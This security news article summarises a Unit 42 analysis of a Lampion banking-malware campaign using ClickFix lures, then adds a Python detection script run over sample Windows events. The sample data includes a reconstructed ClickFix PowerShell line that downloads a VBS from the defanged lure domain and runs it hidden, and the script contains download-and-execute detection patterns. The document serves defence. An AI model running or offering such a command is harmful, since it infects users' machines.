
Lampion, the banking malware first observed in 2019, has reemerged with new tricks. In a detailed analysis, Unit 42 researchers unveiled a highly targeted malware campaign aimed at Portuguese organizations in the government, finance, and transportation sectors.
“During our investigation, we found that the group has added ClickFix lures to their arsenal… under the guise of fixing computer problems,” the researchers explain.
While this campaign shares infrastructure, obfuscation techniques, and infection lures with previous Lampion operations, the attackers have now introduced ClickFix—a deceptive tactic that prompts users to copy and execute malicious PowerShell commands, believing they are resolving system issues.
“The campaign’s infection chain began with a phishing email… An HTML file within this ZIP file redirects the victim to autoridade-tributaria[.]com, a website mimicking a legitimate Portuguese tax authority,” the researchers write.
From there, users are instructed to run a PowerShell command masked as a system fix, complete with a deceptive Portuguese comment: “#Habilitar Visualização de ficheiro” (this translates to “Enable File Preview” in English).

Lampion’s infection chain is long, fragmented, and intentionally obfuscated:
- Stages 1 & 2: VBS Downloaders – Initial VBScript files, bloated with junk variables, drop the second-stage payload and launch it through scheduled tasks rather than directly, delaying execution to avoid immediate detection.
- Stage 3: Reconnaissance & Evasion – A massive VBS file (30–50 MB) performs sandbox checks, gathers endpoint metadata, and silently schedules tasks that run on shutdown. “The third stage does not directly execute the fourth stage but… creates a hidden scheduled task that forces the system to shut down.”
- Stage 4: DLL Loader – A DLL of more than 700 MB, named after the infection timestamp, is dropped and executed via rundll32.exe. Each DLL uses Portuguese function names that are unique to its target, so hashes and function-name signatures do not carry across victims.
Despite the layered architecture, researchers note that the final payload—Lampion itself—was commented out, likely indicating an unfinished or testing stage.
ClickFix has become a favored method among cybercriminals, observed in other malware campaigns like Lumma Stealer and NetSupport RAT. Its core strength lies in user deception—convincing victims to self-infect under the pretense of technical troubleshooting.
“This technique manipulates the victim into running a malicious command that infects their machine,” Unit 42 warns.
Unit 42 stresses the need for both technical defenses and user education:
- Monitor PowerShell and clipboard activity.
- Educate users on ClickFix tactics and suspicious technical prompts.
- Establish strict filters for VBScript and macro-based attachments.
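To show what the monitoring advice above looks like in practice against the chain described earlier, here is an added example (written for this article, not code from Unit 42 or from Lampion) that runs a few detection rules over constructed Windows event records. The lure comment, the autoridade-tributaria[.]com domain, the VBS scheduled tasks, the shutdown task and the rundll32 stage come from the article; the event field layout, the event IDs used as hints (4104 PowerShell ScriptBlockLogging, 4698 scheduled task creation, Sysmon event 1 process creation), the 100 MB DLL size threshold, the DLL export name and the sample hostnames are assumptions made for the example. Clipboard contents are not in these logs, so the ClickFix rule keys on the script block the pasted command produces.

```python
import re

# Constructed sample events (not real telemetry). The field layout is an
# assumption for this example; map your own EDR/Sysmon/Security-log schema onto it.
SAMPLE_EVENTS = [
    # 1. PowerShell ScriptBlockLogging (4104): the ClickFix command the victim pasted,
    #    carrying the Portuguese "fix" comment and the lure domain from the article.
    {"id": 4104, "host": "ws01", "user": "ana",
     "script": "#Habilitar Visualização de ficheiro\n"
               "Start-Process -WindowStyle Hidden powershell -ArgumentList "
               "'iwr http://autoridade-tributaria[.]com/x.vbs -OutFile $env:TEMP\\x.vbs; "
               "wscript $env:TEMP\\x.vbs'"},
    # 2. Scheduled task created (4698): stage-1 VBS scheduling the stage-2 VBS.
    {"id": 4698, "host": "ws01", "user": "ana", "task": "\\Microsoft\\Update",
     "action": "C:\\Windows\\System32\\wscript.exe C:\\Users\\ana\\AppData\\Roaming\\s2.vbs"},
    # 3. Scheduled task created: stage-3's hidden task that forces a shutdown.
    {"id": 4698, "host": "ws01", "user": "ana", "task": "\\Maint",
     "action": "C:\\Windows\\System32\\shutdown.exe /s /f /t 0"},
    # 4. Process creation (Sysmon 1): stage-4 DLL loaded by rundll32 from a user-writable
    #    path, timestamp-named and oversized as described. Export name "Iniciar" is made up.
    {"id": 1, "host": "ws01", "user": "ana", "image": "C:\\Windows\\System32\\rundll32.exe",
     "cmdline": "rundll32.exe C:\\Users\\ana\\AppData\\Local\\20250505143012.dll,Iniciar",
     "parent": "C:\\Windows\\System32\\svchost.exe", "dll_size": 734_003_200},
    # 5. Benign noise: an admin's nightly backup task.
    {"id": 4698, "host": "srv01", "user": "svc_backup", "task": "\\Backup",
     "action": "C:\\Program Files\\Backup\\backup.exe --nightly"},
    # 6. Benign: Windows itself invoking rundll32 on a System32 DLL.
    {"id": 1, "host": "srv01", "user": "SYSTEM", "image": "C:\\Windows\\System32\\rundll32.exe",
     "cmdline": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL",
     "parent": "C:\\Windows\\explorer.exe"},
]

LURE_COMMENT = "Habilitar Visualização de ficheiro"  # comment in the lure, per the article
USER_WRITABLE = re.compile(r"\\Users\\|\\AppData\\|\\Temp\\|\\ProgramData\\|\\Public\\", re.I)
# Generic download-then-execute shape (assumed heuristic, not a Lampion-specific string).
DOWNLOAD_EXEC = re.compile(
    r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl)\b.*"
    r"\b(iex|invoke-expression|wscript|cscript|rundll32|start-process)\b", re.I | re.S)


def clickfix_powershell(ev):
    """Script block carrying the lure comment, or fetching and running a payload."""
    if ev.get("id") != 4104:
        return None
    text = ev.get("script", "")
    if LURE_COMMENT in text:
        return "ClickFix lure comment in PowerShell script block"
    if DOWNLOAD_EXEC.search(text):
        return "PowerShell script block downloads and executes a payload"
    return None


def vbs_scheduled_task(ev):
    """Stages 1-2: a newly created task whose action runs a .vbs via wscript/cscript."""
    if ev.get("id") != 4698:
        return None
    if re.search(r"\b[wc]script(\.exe)?\b.*\.vbs\b", ev.get("action", ""), re.I):
        return "scheduled task runs a VBScript"
    return None


def shutdown_scheduled_task(ev):
    """Stage 3: a newly created task that forces a shutdown or restart."""
    if ev.get("id") != 4698:
        return None
    if re.search(r"\bshutdown(\.exe)?\s.*(/s|/r)\b", ev.get("action", ""), re.I):
        return "scheduled task forces a shutdown/restart"
    return None


def rundll32_user_dll(ev):
    """Stage 4: rundll32 loading a DLL that is user-writable, timestamp-named or huge."""
    if ev.get("id") != 1 or not ev.get("image", "").lower().endswith("rundll32.exe"):
        return None
    m = re.search(r"rundll32(\.exe)?\s+\"?([^\",]+\.dll)", ev.get("cmdline", ""), re.I)
    if not m:
        return None
    dll = m.group(2)
    reasons = []
    if USER_WRITABLE.search(dll):
        reasons.append("DLL in user-writable path")
    if re.search(r"\\\d{12,}\.dll$", dll, re.I):
        reasons.append("timestamp-like DLL name")
    if ev.get("dll_size", 0) > 100 * 1024 * 1024:  # threshold is an assumption
        reasons.append("oversized DLL (>100 MB)")
    if not reasons:
        return None
    return "rundll32 loads suspicious DLL: " + ", ".join(reasons)


RULES = [clickfix_powershell, vbs_scheduled_task, shutdown_scheduled_task, rundll32_user_dll]


def run_detections(events):
    """Return (rule_name, host, reason) for every event that trips a rule."""
    hits = []
    for ev in events:
        for rule in RULES:
            reason = rule(ev)
            if reason:
                hits.append((rule.__name__, ev.get("host"), reason))
    return hits


def hosts_with_full_chain(events):
    """Hosts on which every stage fired: a far stronger signal than one noisy hit."""
    seen = {}
    for rule_name, host, _ in run_detections(events):
        seen.setdefault(host, set()).add(rule_name)
    all_rules = {rule.__name__ for rule in RULES}
    return sorted(host for host, fired in seen.items() if fired == all_rules)


if __name__ == "__main__":
    for hit in run_detections(SAMPLE_EVENTS):
        print(hit)
    print("full chain on:", hosts_with_full_chain(SAMPLE_EVENTS))
```

Each rule on its own will produce false positives (admins do schedule shutdowns and run wscript), which is why the last function correlates them per host; in a real deployment the 4104 rule depends on ScriptBlockLogging being enabled, and the rundll32 rule needs an EDR that records the loaded file's size.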